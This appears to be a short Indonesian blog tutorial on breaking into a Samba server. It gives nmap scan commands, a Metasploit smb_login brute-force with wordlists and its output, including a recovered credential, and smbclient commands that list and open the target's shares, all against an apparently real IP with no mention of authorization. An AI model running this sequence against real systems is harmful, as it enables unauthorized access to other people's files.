Begitu banyak exploit yang bisa dimanfaatkan dari port 445, salah satunya yang saya tuliskan ini adalah pembahasan satu dari ratusan cara menguji server yang menggunakan samba.
Untuk pengertian samba sendiri tidak jauh berbeda dengan FTP, kamu bisa memahami lebih detail di artikel yang berbeda.
Oke, untuk tool yang dibutuhkan
- nmap
- metasploit
- smbclient
NOTE : Untuk menjaga keaman privasi, dalam artikel IP sudah saya ganti.
Scan dulu target menggunakan nmap, untu melihat port berapa saja yang terbuka
root@kali:~# nmap -O -sV 36.81.114.36
Yapp, ada port 445 yang terbuka, kita lihat lebih detail tentang host samba target, kalian bisa menambahkan option script dengan script-file smb-os-discovery
root@kali:~# nmap -O -sV 36.81.114.36 --script=smb-os-discovery -p 445
Oke catatan sudah terkumpul.
Untuk mengetahui password yang digunakan oleh target saya akan memakai bantuan metasploit guna melakukan bruteforce
msf > use auxiliary/scanner/smb/smb_login
msf auxiliary(smb_login) > set RHOSTS 36.81.114.36
RHOSTS => 36.81.114.36
msf auxiliary(smb_login) > set USER_FILE wordlist/user.txt
USER_FILE => wordlist/user.txt
msf auxiliary(smb_login) > set PASS_FILE wordlist/listpassword.txt
PASS_FILE => wordlist/listpassword.txt
msf auxiliary(smb_login) > run
[*] 36.81.114.36:445 SMB - Starting SMB login bruteforce
[*] 36.81.114.36 - This system allows guest sessions with any credentials
... snip ...
[+] 36.81.114.36:445 SMB - Success: 'WORKSTATION\SMILE:serverdusatu' Guest
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Next step, lakukan connect untuk melihat folder yang di share oleh si target
smbclient -L [ ip target ] -U [ computer name ] -p 445
root@kali:~# smbclient -L 36.81.114.36 -U serverdusatu -p 445
Ada 2 folder yang di share, coba kita akses salah satu
smbclient //[ip target]/[folder] -U [computer name] -p 445
root@kali:~# smbclient //36.81.114.36/Users -U serverdusatu -p 445
Jika berhasil akan tampak seperti gambar di atas.
Regards : Altiiever